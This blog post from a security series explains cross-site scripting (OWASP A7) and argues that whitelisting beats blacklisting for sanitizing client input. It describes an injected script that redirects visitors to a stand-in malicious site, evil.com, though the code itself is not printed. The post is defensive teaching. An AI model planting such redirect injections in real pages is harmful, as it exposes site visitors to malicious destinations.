Dev Overflow – Part 9

By Mikhail Sudakov, Cyber Security Architect and Analyst, LEO Cyber Security.

Back to Part 8

Example of XSS that would redirect a victim browsing a particular blog page to the given malicious site.

Yep, it is still here, and here to stay! What are we talking about today?

A7 – Cross-Site Scripting (XSS)

“XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user-supplied data using a browser API that can create HTML or JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.” – (OWASP). OWASP mentions that XSS is the second most prevalent issue in the Top 10 and is found in around two-thirds of all applications. Yeah, it’s that bad.

In Part 7 of this series while discussing OWASP A5 – Broken Access Controls, I mentioned the zero-trust model for software development. The model is quite basic actually: trust nothing, verify everything. Yet, even some of the most experienced and security-conscious developers sometimes fail to abide by it. There can be other causes for XSS vulnerabilities in applications, but failure to live by this zero-trust rule is truly at the very heart of the issue.

First and foremost, let me stress that nothing (nothing!) running in client browser or coming from client should be trusted. That’s because the client can modify any and all content on any web page, including JavaScript content running in memory. An adversary can literally mold anything delivered to the client into something evil. It’s that simple. Misfortune awaits those apps that trustingly accept user data from client. Trust nothing or get wrecked!

The vast majority of applications that exist take some information from their users in order to, well, do things for those users. A very common function for applications to do is take some arbitrary input from users and then display it in some way to the same users or to others as well. Think of a typical blogging application, for example, or even a complex social media platform like Facebook or Twitter. Now, consider the attempted XSS vulnerability example I am trying to exploit at the very top.

If an application blindly takes that input and, without any escaping or sanitization, plops it into a database for future use – that would be a horrible blunder. I hope you can see that if that raw data was rendered into an HTML page inside a victim’s browser, the browser’s active window will get immediately redirected to… http://www.evil.com/git-rekt.php, which looks like it will land the poor unsuspecting user into a world of pain. So, that’s obviously not good. Therefore, we must somehow “disarm” any data coming from client that we will be using in some way. There are different terms used for what I will be discussing next, but I’ll stick to the common labels of black- versus whitelisting.

What is blacklisting? Think of Gandalf the Grey shouting at the Balrog: “You shall not PASS!” See that “<script>” sequence of characters in my input? – that’s got to go. So what we can naively do is write some logic that drops or encodes that specific sequence of bytes. That’s all a blacklist is: it’s a defined collection of “known” bad things we do not want to deal with. By its definition, anything that is not explicitly in the blacklist passes.

Now what is whitelisting? It is the exact opposite of blacklisting actually. Instead of specifying a list of known bad things, we specify a list of all known good things. Then, we can take some kind of action toward anything and everything that does not fit our whitelist of known good. For example, a common action would be to convert those bytes to something like HTML-encoded text. Another, less frequent, action would be to drop those bytes completely (also sometimes called purging).

There are several schools of thought on this subject, but I believe it is generally agreed that blacklisting is definitely inferior to whitelisting. The only downside for whitelisting is simply that an unwanted action can be taken against a byte that is in fact benign because the whitelist is not up-to-date. On the other hand, the main downside of a blacklist is much worse: a previously unaccounted-for evil slips through because the blacklist is not updated or is not complete. And seriously, how can we be sure that we accounted for all unwanted patterns? We are humans after all, and what humans do extremely and consistently well is make mistakes.

Unsanitized data coming from client can land us in a lot of trouble. It is what XSS thrives on. Security is a state of mind, and programmers who follow the zero-trust development model will stand the best chance in defending their applications or modules from XSS vulnerabilities. It is definitely worth noting that most frameworks have good and dependable whitelisting capabilities, and it is often a blunder to be using a “homebrewed” solution.

In the next post, we will take a look at OWASP A8 – Insecure Deserialization.

Mikhail is a cybersecurity professional with an enormous passion for the field and thirst for knowledge. In addition to his day job, Mikhail is a professor of cryptology at St. Bonaventure University. A programmer specializing in software security and cryptology, Mikhail always seeks to expand his horizons, hone his skills, and take on new challenges. One day, he hopes to know enough to realize that he knows nothing. Mikhail holds an Offensive Security certification (OSCP) and, although he is a “Russian hacker”, his hat is white and his directive is to protect.

Comments

    Leave a Comment